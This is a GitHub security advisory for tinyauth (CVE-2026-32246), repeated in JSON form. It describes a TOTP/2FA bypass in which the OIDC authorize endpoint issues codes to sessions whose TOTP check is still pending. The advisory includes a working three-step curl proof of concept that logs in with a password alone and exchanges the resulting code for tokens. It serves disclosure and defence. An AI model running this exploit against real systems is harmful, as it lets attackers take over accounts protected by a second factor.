GHSA-3Q28-QJRV-QR39

Vulnerability from github – Published: 2026-03-12 16:38 – Updated: 2026-03-13 13:35
VLAI?
Summary
Tinyauth vulnerable to TOTP/2FA bypass via OIDC authorize endpoint
Details

Summary

The OIDC authorization endpoint allows users with a TOTP-pending session (password verified, TOTP not yet completed) to obtain authorization codes. An attacker who knows a user's password but not their TOTP secret can obtain valid OIDC tokens, completely bypassing the second factor.

Details

When a user with TOTP enabled logs in at POST /api/user/login, the server creates a session with TotpPending: true and returns a session cookie. The context middleware (internal/middleware/context_middleware.go:56-66) correctly sets TotpPending: true and does not set IsLoggedIn for these sessions.

However, the OIDC authorize handler (internal/controller/oidc_controller.go:105-116) only checks whether a user context exists via utils.GetContext(c). It does not check IsLoggedIn or TotpPending. Since the context middleware populates a context for TOTP-pending sessions (with the username filled in), GetContext succeeds, and the handler proceeds to issue an authorization code at line 156 using the username from the incomplete session.

For comparison, the proxy controller (internal/controller/proxy_controller.go:176-179) correctly blocks TOTP-incomplete sessions by checking IsBasicAuth && TotpEnabled and setting IsLoggedIn = false. The OIDC authorize handler has no equivalent guard.

StoreCode at internal/service/oidc_service.go:305 saves the code with the victim's sub claim. The attacker then exchanges this code at POST /api/oidc/token for a valid access token and ID token.

PoC

Prerequisites: a tinyauth instance with at least one OIDC client configured and a local user with TOTP enabled.

Step 1 — Log in with password only (do not complete TOTP):

curl -c cookies.txt -X POST http://localhost:3000/api/user/login \
  -H "Content-Type: application/json" \
  -d '{"username":"totpuser","password":"totp123"}'

Response: {"message":"TOTP required","status":200,"totpPending":true}

Step 2 — Request an OIDC authorization code using the TOTP-pending cookie:

curl -b cookies.txt -X POST http://localhost:3000/api/oidc/authorize \
  -H "Content-Type: application/json" \
  -d '{"client_id":"my-client-id","redirect_uri":"http://localhost:8080/callback","response_type":"code","scope":"openid","state":"test"}'

Response: {"redirect_uri":"http://localhost:8080/callback?code=<AUTH_CODE>&state=test","status":200}

Step 3 — Exchange the code for tokens:

curl -X POST http://localhost:3000/api/oidc/token \
  -u "my-client-id:my-client-secret" \
  -d "grant_type=authorization_code&code=<AUTH_CODE>&redirect_uri=http://localhost:8080/callback"

Response contains access_token, id_token, and refresh_token for the victim user. TOTP was never submitted.

Impact

Complete bypass of TOTP/MFA for any user account on any tinyauth instance that has OIDC clients configured. An attacker who has compromised a user's password (credential stuffing, phishing, database breach) can obtain SSO tokens for that user's identity without knowing the TOTP secret. This defeats the purpose of the second factor entirely. All downstream applications relying on tinyauth's OIDC provider for authentication are affected.

Severity ?
8.5 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/steveiliop56/tinyauth"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.1-20260311144920-9eb2d33064b7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32246"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-12T16:38:46Z",
    "nvd_published_at": "2026-03-12T19:16:19Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe OIDC authorization endpoint allows users with a TOTP-pending session (password verified, TOTP not yet completed) to obtain authorization codes. An attacker who knows a user\u0027s password but not their TOTP secret can obtain valid OIDC tokens, completely bypassing the second factor.\n\n### Details\n\nWhen a user with TOTP enabled logs in at `POST /api/user/login`, the server creates a session with `TotpPending: true` and returns a session cookie. The context middleware (`internal/middleware/context_middleware.go:56-66`) correctly sets `TotpPending: true` and does not set `IsLoggedIn` for these sessions.\n\nHowever, the OIDC authorize handler (`internal/controller/oidc_controller.go:105-116`) only checks whether a user context exists via `utils.GetContext(c)`. It does not check `IsLoggedIn` or `TotpPending`. Since the context middleware populates a context for TOTP-pending sessions (with the username filled in), `GetContext` succeeds, and the handler proceeds to issue an authorization code at line 156 using the username from the incomplete session.\n\nFor comparison, the proxy controller (`internal/controller/proxy_controller.go:176-179`) correctly blocks TOTP-incomplete sessions by checking `IsBasicAuth \u0026\u0026 TotpEnabled` and setting `IsLoggedIn = false`. The OIDC authorize handler has no equivalent guard.\n\n`StoreCode` at `internal/service/oidc_service.go:305` saves the code with the victim\u0027s `sub` claim. The attacker then exchanges this code at `POST /api/oidc/token` for a valid access token and ID token.\n\n### PoC\n\nPrerequisites: a tinyauth instance with at least one OIDC client configured and a local user with TOTP enabled.\n\nStep 1 \u2014 Log in with password only (do not complete TOTP):\n\n```\ncurl -c cookies.txt -X POST http://localhost:3000/api/user/login \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"username\":\"totpuser\",\"password\":\"totp123\"}\u0027\n```\n\nResponse: `{\"message\":\"TOTP required\",\"status\":200,\"totpPending\":true}`\n\nStep 2 \u2014 Request an OIDC authorization code using the TOTP-pending cookie:\n\n```\ncurl -b cookies.txt -X POST http://localhost:3000/api/oidc/authorize \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"client_id\":\"my-client-id\",\"redirect_uri\":\"http://localhost:8080/callback\",\"response_type\":\"code\",\"scope\":\"openid\",\"state\":\"test\"}\u0027\n```\n\nResponse: `{\"redirect_uri\":\"http://localhost:8080/callback?code=\u003cAUTH_CODE\u003e\u0026state=test\",\"status\":200}`\n\nStep 3 \u2014 Exchange the code for tokens:\n\n```\ncurl -X POST http://localhost:3000/api/oidc/token \\\n  -u \"my-client-id:my-client-secret\" \\\n  -d \"grant_type=authorization_code\u0026code=\u003cAUTH_CODE\u003e\u0026redirect_uri=http://localhost:8080/callback\"\n```\n\nResponse contains `access_token`, `id_token`, and `refresh_token` for the victim user. TOTP was never submitted.\n\n### Impact\n\nComplete bypass of TOTP/MFA for any user account on any tinyauth instance that has OIDC clients configured. An attacker who has compromised a user\u0027s password (credential stuffing, phishing, database breach) can obtain SSO tokens for that user\u0027s identity without knowing the TOTP secret. This defeats the purpose of the second factor entirely. All downstream applications relying on tinyauth\u0027s OIDC provider for authentication are affected.",
  "id": "GHSA-3q28-qjrv-qr39",
  "modified": "2026-03-13T13:35:22Z",
  "published": "2026-03-12T16:38:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/steveiliop56/tinyauth/security/advisories/GHSA-3q28-qjrv-qr39"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32246"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/steveiliop56/tinyauth"
    },
    {
      "type": "WEB",
      "url": "https://github.com/steveiliop56/tinyauth/releases/tag/v5.0.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Tinyauth vulnerable to TOTP/2FA bypass via OIDC authorize endpoint"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.